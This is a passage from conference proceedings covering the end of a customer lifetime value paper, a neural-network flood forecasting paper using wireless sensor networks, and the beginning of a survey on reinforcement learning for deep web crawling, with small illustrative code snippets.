used to predict customer lifetime value through a data mining technique in a direct
selling company.
3 Proposed Framework
4 Results
After executing our models, we can predict the lifetime value of each customer;
the figures below show the results of executing the model. From these figures, we
can see the forecast of each customer’s lifetime value for the next 30 days, as
well as the probability of a customer being alive in the upcoming 30 days (Fig. 2).
From Fig. 3 it is clearly visible that the predicted values are close to the actual
values.
The mean absolute error (MAE) is used to evaluate the predictions against the
actual values:

$$\text{MAE} = \frac{1}{n} \sum_{i=1}^{n} |y_i - x_i| \qquad (1)$$
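Equation (1) is straightforward to implement; a minimal sketch with illustrative numbers:

```python
def mae(actual, predicted):
    """Mean absolute error, Eq. (1)."""
    assert len(actual) == len(predicted)
    return sum(abs(y - x) for y, x in zip(actual, predicted)) / len(actual)

print(mae([10, 12, 14], [11, 12, 13]))   # (1 + 0 + 1) / 3
```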
5 Conclusion
An evaluation is done to see how well the model predicts when compared to the actual
values. In this work, it has been clearly demonstrated, through the literature review
and introduction, how customer lifetime value can be helpful to companies; to that
end, the system was developed using RFM, and the score factor showed the
performance of the model.
References
1. Chen, D., Sain, S. L., & Guo, K. (2012). Data mining for the online retail industry: A case study
of RFM model-based customer segmentation using data mining. Journal Database Marketing
Customer Strategic Management, 19(3), 197–208. https://doi.org/10.1057/dbm.2012.17
2. Yoseph, F., & Heikkila, M. (2019). Segmenting retail customers with an enhanced RFM and
a hybrid regression/clustering method. In Proceedings of the International Conference on Machine
Learning and Data Engineering, iCMLDE 2018 (pp. 77–82). https://doi.org/10.1109/iCMLDE.2018.00029.
3. Pramono, P. P., Surjandari, I., & Laoh, E. (2019). Estimating customer segmentation based
on customer lifetime value using two-stage clustering method. In 2019 16th International
Conference on Service Systems and Service Management, ICSSSM 2019 (pp. 1–5). https://
doi.org/10.1109/ICSSSM.2019.8887704.
4. Christy, A. J., Umamakeswari, A., Priyatharsini, L., & Neyaa, A. (2018). RFM ranking: An
effective approach to customer segmentation. Journal of King Saud University - Computer
and Information Sciences. https://doi.org/10.1016/j.jksuci.2018.09.004.
5. Heldt, R., Silveira, C. S., & Luce, F. B. (2019). Predicting customer value per product: From
RFM to RFM/P. Journal of Business Research. https://doi.org/10.1016/j.jbusres.2019.05.001.
6. He, X., & Li, C. (2017). The research and application of customer segmentation on e-commerce
websites. In Proceedings—2016 International Conference Digital Home, ICDH 2016 (pp. 203–
208). https://doi.org/10.1109/ICDH.2016.050.
7. Jia, H. & Li, C. (2019) The research of customer lifetime value related to risk factors in
the internet business. In Proceedings—18th IEEE/ACIS International Conference Computer
Information Science ICIS 2019 (Vol. 1, pp. 105–110). https://doi.org/10.1109/ICIS46139.2019.
8940315.
8. Çavdar, A. B., & Ferhatosmanoğlu, N. (2018). Airline customer lifetime value estimation using
data analytics supported by social network information. Journal of Air Transport Management,
67, 19–33. https://doi.org/10.1016/j.jairtraman.2017.10.007
9. Dahana, W. D., Miwa, Y., & Morisada, M. (2019). Linking lifestyle to customer lifetime value:
An exploratory study in an online fashion retail market. Journal of Business Research, 99,
319–331. https://doi.org/10.1016/j.jbusres.2019.02.049
10. Chiang, L. L., & Yang, C. S. (2018). Does country-of-origin brand personality generate retail
customer lifetime value? A big data analytics approach. Technology Forecasting Social Change,
130, 177–187. https://doi.org/10.1016/j.techfore.2017.06.034
11. Hasanpour, Y., Nemati, S., & Tavoli, R. (2018). Clustering system group customers through
fuzzy C-Means clustering. In Proceedings—2018 4th Iranian Conference Signal Processing
Intelligence System ICSPIS 2018. (pp. 161–165). https://doi.org/10.1109/ICSPIS.2018.870
0548.
12. Monalisa, S., Nadya, P., & Novita, R. (2019). Analysis for customer lifetime value categoriza-
tion with RFM model. Procedia Computer Science, 161, 834–840. https://doi.org/10.1016/j.
procs.2019.11.190
13. Kim, Y. P., Boo, S., & Qu, H. (2018). Calculating tourists’ customer equity and maximizing the
hotel’s ROI. Tourism Management, 69(March), 408–421. https://doi.org/10.1016/j.tourman.
2018.05.001
14. Srivastava, M., & Rai, A. K. (2018). Mechanics of engendering customer loyalty: A conceptual
framework. IIMB Management Review, 30(3), 207–218. https://doi.org/10.1016/j.iimb.2018.
05.002
15. Lee, E., Kim, B., Kang, S., Kang, B., Jang, Y., & Kim, H. K. (2018). Profit optimizing churn
prediction for long-term loyal customers in online games. IEEE Transaction Games, 12(1),
41–53. https://doi.org/10.1109/tg.2018.2871215
16. Singh, L., Kaur, N., & Chetty, G. (2018) Customer life time value model framework using
gradient boost trees with RANSAC response regularization. In Proceeding International Jt.
Conference Neural Networks (Vol. 2018-July, pp. 1–8). https://doi.org/10.1109/IJCNN.2018.
8489710.
17. Hyun, S. S., & Perdue, R. R. (2017). Understanding the dimensions of customer relationships
in the hotel and restaurant industries. International Journal of Hospitality Management, 64,
73–84. https://doi.org/10.1016/j.ijhm.2017.03.002
18. Baidya, M. K., Maity, B., Ghose, K. (2019). Innovation in marketing strategy: A customer
lifetime value approach 25, 25–41. https://doi.org/10.6347/JBM.201909.
19. Mauricio, A. P., Payawal, J. M. M., Dela Cueva, M. A., & Quevedo, V. C. (2016) Predicting
customer lifetime value through data mining technique in a direct selling company. In 2016
International Conference Industrial Engineering Management Science Application (pp. 1–5).
https://doi.org/10.1109/ICIMSA.2016.7504027.
An Intelligent Flood Forecasting System
Using Artificial Neural Network in WSN
Abstract The flood forecasting system is widely used in hydrological research,
and neural networks have provided considerable assistance in flood prediction.
A flood alert system enhances public safety by mitigating damage.
The proposed model is an intelligent flood alerting system using a neural network
over a wireless sensor network (WSN). The neural network model is built from past
rainfall measurements, with rainfall over diverse durations and the flow of water. Various
environmental factors are considered while training the proposed model, and the
significant insights are framed. This paper incorporates the fuzzy and sigmoid
functions for identifying the rainfall-runoff process. The proposed model is evaluated
by comparing the parameters end-to-end delay, packet loss, and throughput. From
the observation and comparison of results, the proposed model has the best outcome.
The simulation analysis is compared with the existing approach and achieves an
effective prediction.
Keywords Neural network · Flood forecasting · Water level · Packet loss ·
Throughput
1 Introduction
The main intent of flood prediction is to minimize the economic impact and the
risk to human lives [1–3]. An effective flood alert system assists in the collection
of data, analysis of the collected data, monitoring of rainfall, and warning
people about floods as the water level rises. Wireless sensor nodes
and wireless sensor networks play a prominent role in the entire flood
prediction process [4]. The nodes at the sites gather data about the atmospheric
K. S. R. Kumar
Department of CSE, RYM EC, Ballari, Karnataka, India
R. V. Biradar (B)
Department of CSE, BITM, Ballari, Karnataka, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 279
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_23
2 Related Work
Disasters in Southeast Asia result in great economic damage and loss of life.
International agencies and governments have formulated disaster response methods
developed with remote sensing data that monitor the environment temporally and
spatially [15]. The normalized difference vegetation index is applied to train the
water classifier used at the time of interest. An operational flood identification
component is generated that performs
the composition of the image. Radar-based observation of historic rainfall events
and its assessment accuracy are presented. The decision support approach provides
a supportive tool and the needed information to the developing organization.
Operational flood risk is managed by the Global Flood Partnership, and the
result is used to monitor and predict flood events [16]. The developed approach
reduces the impact of disasters and maintains emergency operations effectively.
The flood prediction model developed using a wireless sensor network [17] predicts
the occurrence of floods in a river in a fast and simple manner. The proposed
approach saves people by predicting floods effectively.
The linear regression approach is incorporated with WSN and uses multiple
variables. The approach is reliable and independent of parameters, making it
desirable for any real-time scenario. It is effective in several situations but
has some performance limitations, namely ineffectiveness and inaccuracy. In
certain countries, rainfall and typhoons are common, and intensified, prolonged
rainfall causes floods [18].
A predictive model is developed to predict the status of rainfall and flood.
Rainfall data is collected from the rain gauge using sensors and microcontrollers.
The data is then analyzed, and advisories as well as warnings are given to
the relevant person. Environmental factors such as rainfall amount, temperature,
water level, and humidity are monitored; the information from the sensor nodes
helps in the prediction of floods and water levels [19].
Flood is a recurrent disaster across the world that happens due to excess flow of
water, specifically in low-lying areas. The quality of water affects the lifespan
of living beings on the earth. The proposed system describes the deployment and
design of a real-time water quality and flood observation system with fast and
simple estimation that provides effective control measures [20].
The main aim of the steamflood and waterflood tracking system (SWATS)
[21] is to permit continuous observation of steamflood and waterflood
systems with granular attention, short delay and low cost, while giving high
reliability and effective accuracy. Identification and anomaly recognition is a
challenging problem because of the intrinsic unreliability and inaccuracy of sensors
that are transitory with the characteristics of the water flows. The inefficiency and
inaccuracy in the existing approaches are rectified using the artificial neural
network, as discussed in Sect. 3.
approach is illustrated in the figure. The overall testing and training of rainfall
data using a neural network for rainfall forecasting are displayed in Fig. 1.
The rainfall-runoff process is modeled via a neural network with one hidden layer,
with the water level a(t + l) as the target value. The past water level is taken as
input, and it is associated with the n available rain gauges rf1, rf2, …, rfn,
whose time lags are signified as tl1, tl2, …, tln. The time taken by rainwater to
reach the river is accounted for by these time lags, and every input gauge point has
the same order q. The rainfall measures entering as exogenous variables are
rf1(t − tl1), rf1(t − tl1 − 1), …, rf1(t − tl1 − q + 1), …, rfn(t − tln), …,
rfn(t − tln − q + 1), so the overall network input comprises (a + n · q) variables.
The vector v is composed of all the input variables.
Within the developed network, the hidden layer sums the input values at the kth
node, as follows:

$$X_k = \sum_{j=0}^{a + n \cdot q} w_{jk} v_j - b_k \qquad (1)$$

where the weight $w_{jk}$ is assigned to input $v_j$ at the kth node and $b_k$ is the
neuron bias. The signal $X_k$ becomes the argument of the activation function at the neuron.
Table 1 Assignment of threshold values

Data collection   High       Medium        Low
Humidity          >40%       20–40%        <20%
Water level       >72%       30–72%        <30%
Vibration         >150 mH    50–150 mH     <50 mH
Temperature       >34 °C     15–34 °C      <15 °C
2
Ck = f (X k ) = 1 − (2)
exp 2X j + 1
The outputs C_k of the hidden-layer neurons are then transmitted to the output layer, a single linear node that weights the values C_k by W_k. This returns the forecast value
a(t + l) = \sum_{k} W_k C_k - b_{ot} \quad (3)
where b_ot denotes the bias associated with the output neuron; the network is organized as a direct forecaster. It returns the l-steps-ahead prediction directly, avoiding the intermediary forecasts required by a recursive scheme, which may propagate errors. Under mild assumptions, a direct forecaster is shown to perform better than the recursive approach. The threshold value assignment and the forecasting are given in Tables 1 and 2.
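The forward pass of Eqs. (1)-(3) can be sketched in a few lines of NumPy; the weight shapes and sample values below are illustrative assumptions, not the paper's trained network.

```python
import numpy as np

def forecast(v, W_hid, b_hid, W_out, b_out):
    """Direct l-steps-ahead forecast of the water level a(t + l).

    Eq. (1): X_k = sum_j w_jk * v_j - b_k     (net input at hidden node k)
    Eq. (2): C_k = 1 - 2 / (exp(2 X_k) + 1)   (activation; equals tanh(X_k))
    Eq. (3): a(t+l) = sum_k W_k * C_k - b_ot  (single linear output node)
    """
    X = W_hid @ v - b_hid                     # Eq. (1)
    C = 1.0 - 2.0 / (np.exp(2.0 * X) + 1.0)   # Eq. (2)
    return float(W_out @ C - b_out)           # Eq. (3)
```

Note that the activation of Eq. (2) is algebraically identical to tanh(X_k), which is why the forecast below matches np.tanh for a hand-built weight matrix.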
The data is collected from diverse sensor nodes and processed with the help of the WSN approach. The dataset is trained using the neural network, and the activation function is applied to acquire the decision from the testing data. The overall performance of the algorithm is illustrated in Fig. 2.
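Mapping a raw reading to the bands of Table 1 is a straightforward lookup; the sketch below is illustrative, and the sensor keys are names chosen here, not identifiers from the paper.

```python
# Threshold bands (low, high) taken from Table 1; readings below `low` are Low,
# readings between `low` and `high` are Medium, and readings above are High.
THRESHOLDS = {
    "humidity":    (20.0, 40.0),    # percent
    "water_level": (30.0, 72.0),    # percent
    "vibration":   (50.0, 150.0),   # mH
    "temperature": (15.0, 34.0),    # degrees C
}

def alert_level(sensor, value):
    """Map a raw sensor reading to its Low / Medium / High band of Table 1."""
    low, high = THRESHOLDS[sensor]
    if value < low:
        return "Low"
    if value <= high:
        return "Medium"
    return "High"
```

For example, a humidity reading of 45% falls in the High band, while a water level of 50% is Medium.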
The proposed flood forecasting system is simulated using the network simulator NS2, and the experiment is implemented with the help of MATLAB. Network parameters, namely delay, packet loss, and throughput, are compared, while packets of constant size are transmitted at an interval of 1 s. The hidden layer of the network is kept static with 12 neurons in one layer. The resulting simulation values are given in Tables 3, 4, and 5.
Throughput is the actual quantity of data sent or received successfully over the communication link. Throughput is measured in bps, and it differs from bandwidth: it is the total amount of information that can be processed in a given amount of time. The topology with the higher throughput performs better. From Table 3, the proposed topology has the highest throughput, as illustrated in Fig. 3.
Packet loss is the rate of data loss during data transmission across the communication channel; it is caused by errors in the network, congestion, data flooding, and link breakage. The topology with the minimum percentage of packet loss is considered the best, and the simulation analysis is given in Table 4. From the results, the proposed model achieves the best result, as illustrated in Figs. 4 and 5.
Table 3 Comparison of throughput and number of nodes

| Number of nodes | Star | Mesh | Proposed model |
|-----------------|------|------|----------------|
| 125             | 150  | 155  | 160            |
| 175             | 140  | 145  | 155            |
| 220             | 130  | 135  | 150            |
| 275             | 135  | 140  | 145            |
| 325             | 120  | 130  | 140            |
| 375             | 115  | 125  | 135            |
| 425             | 100  | 110  | 125            |
Table 4 Comparison of packet loss and pause time

| Pause time (s) | Star | Mesh | Proposed model |
|----------------|------|------|----------------|
| 50             | 20   | 18   | 15             |
| 100            | 34   | 31   | 29             |
| 150            | 42   | 39   | 37             |
| 200            | 56   | 51   | 49             |
| 250            | 58   | 53   | 51             |
| 300            | 60   | 59   | 58             |
| 350            | 63   | 60   | 59             |
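The two comparisons can be reproduced in a few lines; the numbers below are copied from Tables 3 and 4, and the per-topology averaging is simply one convenient way of summarising them.

```python
# Throughput (bps) from Table 3 and packet loss from Table 4, re-keyed by topology.
throughput = {           # rows: 125, 175, 220, 275, 325, 375, 425 nodes
    "star":     [150, 140, 130, 135, 120, 115, 100],
    "mesh":     [155, 145, 135, 140, 130, 125, 110],
    "proposed": [160, 155, 150, 145, 140, 135, 125],
}
packet_loss = {          # rows: pause time 50, 100, ..., 350 s
    "star":     [20, 34, 42, 56, 58, 60, 63],
    "mesh":     [18, 31, 39, 51, 53, 59, 60],
    "proposed": [15, 29, 37, 49, 51, 58, 59],
}

mean = lambda xs: sum(xs) / len(xs)
best_throughput = max(throughput, key=lambda k: mean(throughput[k]))
best_loss = min(packet_loss, key=lambda k: mean(packet_loss[k]))
print(best_throughput, best_loss)  # → proposed proposed
```

Averaged over all rows, the proposed topology has both the highest throughput and the lowest packet loss, consistent with the discussion above.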
286 K. S. R. Kumar and R. V. Biradar
Fig. 3 Throughput (bps) versus number of nodes for the star, mesh, and proposed model topologies
Fig. 4 Packet loss versus pause time (s) for the star, mesh, and proposed model topologies
From the observation of the results and the comparison across various parameters, the proposed approach attained the best results. The flood detection process is highly effective with the proposed ANN model.
The proposed model is trained with a backpropagation approach and uses the sigmoid activation function with a learning rate of 0.8 and an error tolerance of 10^−3. The root mean square error (RMSE) of training and checking over different iterations is given in Table 6 and plotted in Figs. 6 and 7. The training and checking errors of the proposed approach are minimal, and hence, the accuracy is enriched.
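A training loop with the stated settings (sigmoid activation, learning rate 0.8, stop below an RMSE tolerance of 10^−3) could be sketched as below; the layer sizes, initialisation, and epoch cap are illustrative choices, not the paper's exact configuration.

```python
import numpy as np

def train(X, y, hidden=12, lr=0.8, tol=1e-3, max_epochs=200, seed=0):
    """Minimal backpropagation sketch for a one-hidden-layer regressor."""
    rng = np.random.default_rng(seed)
    W1 = rng.normal(0.0, 0.5, (X.shape[1], hidden))
    b1 = np.zeros(hidden)
    W2 = rng.normal(0.0, 0.5, hidden)
    b2 = 0.0
    sigmoid = lambda z: 1.0 / (1.0 + np.exp(-z))
    rmse_history = []
    for _ in range(max_epochs):
        H = sigmoid(X @ W1 + b1)            # hidden activations
        out = H @ W2 + b2                   # linear output node
        err = out - y
        rmse_history.append(float(np.sqrt(np.mean(err ** 2))))
        if rmse_history[-1] < tol:          # error tolerance reached
            break
        g_out = 2.0 * err / len(y)          # gradient of mean squared error
        g_hid = np.outer(g_out, W2) * H * (1.0 - H)  # backprop through sigmoid
        W2 -= lr * (H.T @ g_out)
        b2 -= lr * g_out.sum()
        W1 -= lr * (X.T @ g_hid)
        b1 -= lr * g_hid.sum(axis=0)
    return rmse_history
```

The returned history corresponds to the per-epoch RMSE curves of the kind reported in Table 6 and Figs. 6 and 7.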
5 Conclusion
An intelligent flood alerting system is developed using a neural network for the wireless sensor network (WSN). The sensor nodes scattered across the network utilize a very low-power network and collect data such as rainfall, monthly rainfall rate, humidity, and air speed in the atmosphere. Various environmental factors are considered while training the proposed model, and significant insights are framed. The proposed model is tested by considering parameters such as end-to-end delay, packet loss, and throughput. From the observation of results, the proposed
Fig. 6 Training error versus number of epochs
Fig. 7 Checking error versus number of epochs
model has the best outcome. The flood alert system is framed with the assistance of threshold assignment, and the prediction results are effective, with promising simulation analysis. The simulation parameters of the proposed scheme are investigated by comparing it with the existing star and mesh topologies, and the proposed approach attained the best outcome. In the future, the proposed approach can be used to predict floods in various locations.
References
1. Ragnoli, M., Barile, G., Leoni, A., Ferri, G., & Stornelli, V. (2020). An autonomous low-power
LoRa-based flood-monitoring system. Journal of Low Power Electronics and Applications,
10(2), 15.
2. Shamsi, S. (2019). Flood forecasting review using wireless sensor network. Global Sci-Tech,
11(1), 13–22.
3. Patil, P. S., & Jain, S. S. Survey on flood monitoring & alerting systems.
4. Dwivedi, R. K., Kumari, N., & Kumar, R. (2020). Integration of wireless sensor networks with
cloud towards efficient management in IoT: A review. In Advances in data and information
sciences (pp. 97–107). Springer.
5. Ullah, T. F., Gnana Prakasi O. S., & Kanmani, P. (2020). A review on flood prediction algorithms
and a deep neural network model for estimation of flood occurrence. International Research
Journal of Multidisciplinary Technovation, 2(5), 8–14.
6. Sakib, S. N., Ane, T., Matin, N., & Kaiser, M. S. (2016). An intelligent flood monitoring
system for Bangladesh using wireless sensor network. In 2016 5th International Conference
on Informatics, Electronics and Vision (ICIEV) (pp. 979–984). IEEE.
7. Aziz, N. A. A., & Aziz, K. A. (2011, February). Managing disaster with wireless
sensor networks. In 13th International Conference on Advanced Communication Technology
(ICACT2011) (pp. 202–207). IEEE.
8. Pant, D., Verma, S., & Dhuliya, P. (2017, September). A study on disaster detection and manage-
ment using WSN in Himalayan region of Uttarakhand. In 2017 3rd International Conference
on Advances in Computing, Communication and Automation (ICACCA)(Fall) (pp. 1–6). IEEE.
9. Singh, V. P., Jain, S., & Singhai, J. (2010). Hello flood attack and its countermeasures in wireless
sensor networks. International Journal of Computer Science Issues (IJCSI), 7(3), 23.
10. Lee, J. U., Kim, J. E., Kim, D., Chong, P. K., Kim, J., & Jang, P. (2008, September). RFMS: Real-
time flood monitoring system with wireless sensor networks. In 2008 5th IEEE International
Conference on Mobile Ad Hoc and Sensor Systems (pp. 527–528). IEEE.
11. Hughes, D., Greenwood, P., Blair, G., Coulson, G., Grace, P., Pappenberger, F., … Beven,
K. (2008). An experiment with reflective middleware to support grid-based flood monitoring.
Concurrency and Computation: Practice and Experience, 20(11), 1303–1316.
12. Roy, J. K., Gupta, D., & Goswami, S. (2012, December). An improved flood warning system
using WSN and Artificial Neural Network. In 2012 Annual IEEE India Conference (INDICON)
(pp. 770–774). IEEE.
13. Castillo-Effer, M., Quintela, D. H., Moreno, W., Jordan, R., & Westhoff, W. (2004, November).
Wireless sensor networks for flash-flood alerting. In Proceedings of the Fifth IEEE International
Caracas Conference on Devices, Circuits and Systems, 2004 (Vol. 1, pp. 142–146). IEEE.
14. Merkuryeva, G., Merkuryev, Y., Sokolov, B. V., Potryasaev, S., Zelentsov, V. A., & Lektauers, A.
(2015). Advanced river flood monitoring, modelling and forecasting. Journal of Computational
Science, 10, 77–85.
15. Ahamed, A., & Bolten, J. D. (2017). A MODIS-based automated flood monitoring system for
southeast Asia. International Journal of Applied Earth Observation and Geoinformation, 61,
104–117.
16. Alfieri, L., Cohen, S., Galantowicz, J., Schumann, G. J., Trigg, M. A., Zsoter, E., …, Rudari,
R. (2018). A global network for operational flood risk reduction. Environmental Science and
policy, 84, 149–158.
17. Seal, V., Raha, A., Maity, S., Mitra, S. K., Mukherjee, A., & Naskar, M. K. (2012). A simple
flood forecasting scheme using wireless sensor networks. arXiv preprint arXiv:1203.2511.
18. Panganiban, E. B., & Cruz, J. C. D. (2017, November). Rain water level information with
flood warning system using flat clustering predictive technique. In TENCON 2017–2017 IEEE
Region 10 Conference (pp. 727–732). IEEE.
19. Udo, E. N., & Isong, E. B. (2013). Flood monitoring and detection system using wireless sensor
network. Asian Journal of Computer and Information Systems, 1(04).
20. Jegadeesan, S., Dhamodaran, M., & Sri Shanmugapriya, S. (2018). Wireless sensor network
based flood and water quality monitoring system using IoT. Taga Journal of Graphic
Technology, Online ISSN (1748-0345).
21. Yoon, S., Ye, W., Heidemann, J., Littlefield, B., & Shahabi, C. (2011). SWATS: Wireless sensor
networks for steamflood and waterflood pipeline monitoring. IEEE Network, 25(1), 50–56.
Reinforcement Learning in Deep Web
Crawling: Survey
Abstract Context: Reinforcement learning (RL) can help in solving various challenges of deep web crawling. Deep web content is accessed by filling search forms rather than following hyperlinks. Understanding the search form and proper selection of queries are necessary steps to retrieve deep web content successfully; thus, crawling the deep web is a very challenging task. Reinforcement learning-based techniques help in filling the search form and retrieving the deep web content successfully. RL selects an action based on the given state, and the environment assigns a reward or penalty to the selected action. Objective: This study reports a survey of RL-based techniques applied in the domain of deep web crawling. Method: The survey is based on 31 articles selected from 77 articles published in various reputed journals, conferences, and workshops. Results: Challenges related to the various steps of deep web crawling are presented. RL-based techniques are used in multiple research papers to solve deep web crawling challenges. A comparative analysis of the RL techniques used in deep web crawling is done based on their strengths, metrics, datasets, and research gaps. Conclusion: Various RL-based techniques that have not yet been explored can be applied to deep web crawling. Open challenges and research directions are also recommended.
Keywords Reinforcement learning · Deep web · Ranked deep web · Query · Form
discovery · Query selection · Information Retrieval
1 Introduction
The World Wide Web is a collection of documents that are connected by hyperlinks.
This collection is called the surface web, which is being crawled by various standard
search engines. The part of web which is not accessed by hyperlinks but accessed
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 291
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_24
292 K. Madan and R. Bhatia
through search forms is called the deep web or hidden web. Bergman coined the term deep web in 2001 and estimated its size at 7500 terabytes, compared to 19 terabytes for the surface web [1]. 95% of deep web content is freely available in the public domain. The importance of deep web content cannot be ignored, because it contains higher-quality information than the surface web. A deep web crawler finds the search forms, identifies their labels, fills them with relevant keywords, submits the forms, and crawls the relevant region. Deep web crawling (DWC) consists of five steps [2]: first, automated deep web entry point discovery; second, form modeling; third, query selection; fourth, form submission; and fifth, crawling path learning. Various researchers have proposed different methods to explore the deep web [3, 4]. In DWC, a user enters a query in the search form, and all matched documents are returned, whereas in ranked DWC, a particular query is entered in the search form and only the top k matched documents are returned. Designing a crawler that explores the deep web and the ranked deep web is challenging. Reinforcement learning (RL) has gained tremendous popularity in industry and academia due to its self-learning characteristics [5]. Various RL-based techniques are used in the deep web to solve these challenges, as discussed in Section 3. Different survey papers on DWC techniques were analyzed [6–10]; no survey paper has been published wherein RL-based techniques in DWC are discussed in detail, and these survey papers cover only one or two research papers related to RL in the context of DWC. This motivates us to undertake a survey of RL in DWC. For this survey, a search string containing 'reinforcement learning' and 'deep web crawling' was prepared and executed on the Google Scholar website, returning 77 results [11]. Irrelevant research papers were discarded based on manual inspection of the title, followed by the abstract and a full-text read, in three steps. Figure 1 shows the survey selection criteria for picking the research papers. Step 1 is based on the title of a research paper, and the count is reduced to 70. In step 2, the exclusion is done on
Fig. 1 Survey selection criteria: Step 1, title-based exclusion (70 papers remain); Step 2, abstract-based exclusion (55 papers remain); Step 3, full-text-based exclusion (31 papers remain)
the basis of the abstract, decreasing the research paper count to 55. In step 3, the selection is based on a full-text read; the final count of research papers is 31. This collection has 16 journal papers, 11 conference papers, and 4 book chapters. Publishers of this collection include Springer, IEEE, ACM, Elsevier, Wiley, etc.
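The five DWC steps listed above (entry-point discovery, form modeling, query selection, form submission, and crawling-path learning) can be sketched as a pipeline; every helper below is a toy placeholder standing in for a real component, with names invented here for illustration.

```python
def discover_entry_point(url):            # 1. entry-point discovery
    return {"url": url, "fields": ["title"]}

def build_form_model(form):               # 2. form modeling (labels and types)
    return {field: str for field in form["fields"]}

def select_queries(model):                # 3. query selection
    return [{"title": kw} for kw in ("flood", "sensor")]

def submit_form(form, query):             # 4. form submission
    return [f"{form['url']}/result?{k}={v}" for k, v in query.items()]

def learn_crawling_paths(pages):          # 5. crawling-path learning
    yield from pages

def crawl_deep_web(seed_urls):
    """Chain the five DWC steps over a list of seed URLs."""
    for url in seed_urls:
        form = discover_entry_point(url)
        model = build_form_model(form)
        for query in select_queries(model):
            yield from learn_crawling_paths(submit_form(form, query))
```

Running the pipeline over a single seed yields one synthetic result page per generated query.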
The contributions of this research paper can be summarized as follows:
• To the best of our knowledge, it is the first survey paper that explores the research
papers of RL in the context of DWC.
• A comparative analysis of the various research papers has been done to explore
their functionality, dataset, metrics, and research gaps.
• A discussion on various open challenges of DWC and how RL can help to solve
these challenges.
The focus of the paper is to organize the various research papers related to RL
in the context of DWC. The rest of the paper is structured as follows: Section 2
presents the background details related to DWC and RL. Section 3 discusses RL-
based research papers pertaining to DWC. Section 4 shows the discussion on various
RL-based techniques and their comparative analysis. Finally, Section 5 summarizes
the conclusion and its future directions.
2 Background
This section describes the basic terms needed to understand the deep web. There are various types of forms in the deep web, such as search forms, query forms, login forms, subscription forms, polling forms, and registration forms. Such forms are categorized into two parts: the first is searchable forms, and the second is non-searchable forms. Search forms and query forms come under the category of searchable forms, and all other types of forms come under non-searchable forms. Deep web content can be accessed only through a searchable form, and distinguishing the searchable form from other types of forms is a challenging task. A search form consists of form labels, text boxes, drop-down lists, buttons, etc. Extraction of labels and their semantics is a necessary step to model the forms. Finding the searchable form and form modeling are the two steps that come under the pre-query category [6]. After form modeling, query selection is required for filling the search form. A label value set table was proposed by Raghavan et al. to fill the search form [12]. This table has key-value pairs that generate the query. A query is filled in the search form to submit the form and retrieve the content automatically. The crawler then needs to traverse the path to retrieve the desired information.
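In the spirit of the label value set table of Raghavan et al. [12], each form label can map to a set of candidate values, and the cross product of those sets generates the queries; the labels and values below are hypothetical examples.

```python
from itertools import product

# Hypothetical label value set (LVS) table: form label -> candidate values.
lvs = {
    "author": ["Bergman", "Raghavan"],
    "year": ["2001"],
}

def generate_queries(lvs_table):
    """Yield one query (label -> value dict) per combination of candidate values."""
    labels = list(lvs_table)
    for combo in product(*(lvs_table[label] for label in labels)):
        yield dict(zip(labels, combo))
```

Here the two-by-one table yields two candidate queries, each ready to be filled into the search form.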
RL is a type of machine learning that learns an optimal policy through the interaction of an agent with its environment [13]. The optimal policy is the guideline that helps to select an appropriate action corresponding to a given state. The environment gives a response based on the selected action; this response can either be a reward or a penalty, and a reward is always preferable to a penalty. RL uses the complete framework of the Markov decision process (MDP). An MDP is a four-tuple (S, A, P, R), where 'S' is the set of states, 'A' is the set of actions, 'P' is the probability of reaching the next state given an action, and 'R' is the immediate reward produced by the environment on moving from the current state to the next state. RL maps entities such as agent, environment, actions, states, reward function, objective function, and transition function onto the DWC problem. Q-learning and learning automata are the types of RL algorithms used in the deep web [3, 14]. Designing the reward function is a very challenging task, since a minor change in the reward function has a great impact on the policy. There are two types of methods to design the reward function: the first is a manual numeric method based on domain knowledge; the second is learning directly from expert knowledge using techniques such as preference-based RL, which can be combined with the DWC domain to design the reward function [15]. Reward functions in DWC generally consider instant rewards rather than long-term rewards; this challenge is known as the myopia problem. There are various models to overcome this challenge, such as Q-value-based approximation [3] and the infinite-horizon discounted model [14].
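The MDP framing above can be made concrete with a tabular Q-learning sketch applied to query selection; the environment callable and its reward (e.g. the number of new documents a query retrieves) are assumptions for illustration, not a method from any surveyed paper.

```python
import random
from collections import defaultdict

def q_learning_query_selection(env, queries, episodes=200, alpha=0.5,
                               gamma=0.9, epsilon=0.1, seed=0):
    """Tabular Q-learning over (state, query) pairs.

    `env(state, query)` is a hypothetical callable returning (reward, next_state),
    where the reward could be the number of new documents the query retrieves.
    """
    rng = random.Random(seed)
    Q = defaultdict(float)
    for _ in range(episodes):
        state = 0
        for _ in range(10):                   # fixed-length episode
            if rng.random() < epsilon:        # epsilon-greedy exploration
                query = rng.choice(queries)
            else:
                query = max(queries, key=lambda a: Q[(state, a)])
            reward, nxt = env(state, query)
            best_next = max(Q[(nxt, a)] for a in queries)
            # Standard Q-learning update: move Q toward reward + gamma * max Q'
            Q[(state, query)] += alpha * (reward + gamma * best_next
                                          - Q[(state, query)])
            state = nxt
    return Q
```

With a toy environment that rewards one query and not the other, the learned Q-values rank the rewarding query higher.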
3 Review of Literature
Bergman first introduced the term deep web, in which dynamic content is generated by filling a query into a search form [1]. Various surveys related to the deep web were studied to find the number of papers based on RL techniques, so that new research dimensions could be investigated for this survey.
Hernandez et al. proposed a detailed survey of DWC techniques up to 2017 [2]. However, this survey covered only two research papers based on RL techniques.
Moraes et al. recommended a systematic literature review of search form discovery techniques up to mid-2011 [6]. Only one RL paper, on a form crawler, was covered.
Saini et al. came up with a crawling survey paper in the field of information retrieval covering work up to 2015 [8]. Only one research paper on RL was presented, from the focused crawling domain, and the implementation of RL techniques in the deep web domain was missed.
4 Discussion
